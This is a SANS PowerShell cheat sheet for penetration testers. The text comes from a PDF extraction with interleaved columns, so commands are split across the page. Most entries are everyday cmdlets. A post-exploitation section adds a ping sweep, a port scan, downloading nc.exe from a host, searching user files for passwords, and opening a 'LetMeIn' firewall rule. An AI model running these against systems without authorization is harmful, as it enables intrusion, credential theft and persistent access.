Useful Cmdlets (and aliases) PowerShell for Pen-Tester Post-Exploitation PowerShell Get a directory listing (ls, dir, gci): Conduct a ping sweep: PS C:\> Get-ChildItem PS C:\> 1..255 | % {echo "10.10.10.$_"; Cheat Sheet ping -n 1 -w 100 10.10.10.$_ | Select- v. 4.0 Copy a file (cp, copy, cpi): String ttl} PS C:\> Copy-Item src.txt dst.txt POCKET REFERENCE Conduct a port scan: GUIDE Move a file (mv, move, mi): PS C:\> 1..1024 | % {echo ((new-object http://www.sans.org PS C:\> Move-Item src.txt dst.txt Net.Sockets.TcpClient).Connect("10.10.10 .10",$_)) "Port $_ is open!"} 2>$null Find text within a file: Purpose PS C:\> Select-String –path c:\users Fetch a file via HTTP (wget in PowerShell): \*.txt –pattern password PS C:\> (New-Object The purpose of this cheat sheet is to PS C:\> ls -r c:\users -file | % System.Net.WebClient).DownloadFile("http describe some common options and {Select-String -path $_ -pattern ://10.10.10.10/nc.exe","nc.exe") techniques for use in Microsoft’s password} PowerShell. Find all files with a particular name: Display file contents (cat, type, gc): PS C:\> Get-ChildItem "C:\Users\" - PS C:\> Get-Content file.txt recurse -include *passwords*.txt Get present directory (pwd, gl): Get a listing of all installed Microsoft Hotfixes: PowerShell Overview PS C:\> Get-Location PS C:\> Get-HotFix PowerShell Background Get a process listing (ps, gps): Navigate the Windows registry: PowerShell is the successor to command.com, PS C:\> Get-Process PS C:\> cd HKLM:\ cmd.exe and cscript. Initially released as a PS HKLM:\> ls separate download, it is now built in to all modern Get a service listing: versions of Microsoft Windows. PowerShell PS C:\> Get-Service List programs set to start automatically in the registry: syntax takes the form of verb-noun patterns PS C:\> Get-ItemProperty HKLM:\SOFTWARE implemented in cmdlets. Formatting output of a command (Format-List): \Microsoft\Windows\CurrentVersion\run PS C:\> ls | Format-List –property Launching PowerShell name Convert string from ascii to Base64: PS C:\> PowerShell is accessed by pressing Start -> Paginating output: [System.Convert]::ToBase64String([System typing powershell and pressing enter. PS C:\> ls –r | Out-Host -paging .Text.Encoding]::UTF8.GetBytes("PS Some operations require administrative privileges FTW!")) and can be accomplished by launching Get the SHA1 hash of a file: PowerShell as an elevated session. You can PS C:\> Get-FileHash -Algorithm SHA1 List and modify the Windows firewall rules: launch an elevated PowerShell by pressing Start - file.txt PS C:\> Get-NetFirewallRule –all > typing powershell and pressing Shift-CTRL- PS C:\> New-NetFirewallRule -Action Enter. Exporting output to CSV: Allow -DisplayName LetMeIn - Additionally, PowerShell cmdlets can be called PS C:\> Get-Process | Export-Csv RemoteAddress 10.10.10.25 from cmd.exe by typing: powershell -c procs.csv "<command>". Syntax Getting Help 5 PowerShell Essentials Cmdlets are small scripts that follow a dash- To get help with help: Concept What’s it A Handy Alias separated verb-noun convention such as "Get- PS C:\> Get-Help Do? Process". PS C:\> Get-Help Shows help & PS C:\> help To read cmdlet self documentation: [cmdlet] - examples [cmdlet] - Similar Verbs with Different Actions: PS C:\> Get-Help <cmdlet> examples examples - New- Creates a new resource - Set- Modifies an existing resource Detailed help: PS C:\> Get- Shows a list of PS C:\> gcm - Get- Retrieves an existing resource PS C:\> Get-Help <cmdlet> -detailed Command commands *[string]* - Read- Gets information from a source, such as a file Usage examples: PS C:\> Get- Shows properties PS C:\> [cmdlet] Member & methods | gm - Find- Used to look for an object PS C:\> Get-Help <cmdlet> -examples - Search- Used to create a reference to a resource Full (everything) help: PS C:\> ForEach- Takes each item PS C:\> [cmdlet] Object { $_ } on pipeline and | % { [cmdlet] - Start- (asynchronous) begin an operation, PS C:\> Get-Help <cmdlet> -full handles it as $_ $_ } such as starting a process - Invoke- (synchronous) perform an operation Online help (if available): PS C:\> Select- Searches for PS C:\> sls –path such as running a command PS C:\> Get-Help <cmdlet> -online String strings in files or [file] –pattern output, like grep [string] Parameters: Each verb-noun named cmdlet may have many Pipelining, Loops, and Variables parameters to control cmdlet functionality. Piping cmdlet output to another cmdlet: Objects: Cmdlet Aliases PS C:\> Get-Process | Format-List The output of most cmdlets are objects that can –property name be passed to other cmdlets and further acted Aliases provide short references to long commands. upon. This becomes important in pipelining ForEach-Object in the pipeline (alias ): % cmdlets. PS C:\> ls *.txt | ForEach-Object To list available aliases (alias alias): {cat $_} PS C:\> Get-Alias Where-Object condition (alias or ): To expand an alias into a full name: where ? PS C:\> Get-Process | Where-Object PS C:\> alias <unknown alias> {$_.name –eq "notepad"} PS C:\> alias gcm Finding Cmdlets Generating ranges of numbers and looping: To get a list of all available cmdlets: PS C:\> 1..10 PS C:\> Get-Command Efficient PowerShell PS C:\> 1..10 | % {echo "Hello!"} Tab completion: Get-Command supports filtering. To filter cmdlets Creating and listing variables: PS C:\> get-child<TAB> on the verb set: PS C:\> $tmol = 42 PS C:\> Get-Command Set* or PS C:\> Get-ChildItem PS C:\> ls variable: PS C:\> Get-Command –Verb Set Parameter shortening: is equivalent to: Examples of passing cmdlet output down pipeline: Or on the noun process: PS C:\> ls –recurse PS C:\> ls -r PS C:\> dir | group extension | sort PS C:\> Get-Command *Process or PS C:\> Get-Service dhcp | Stop- PS C:\> Get-Command –Noun process Service -PassThru | Set-Service - StartupType Disabled .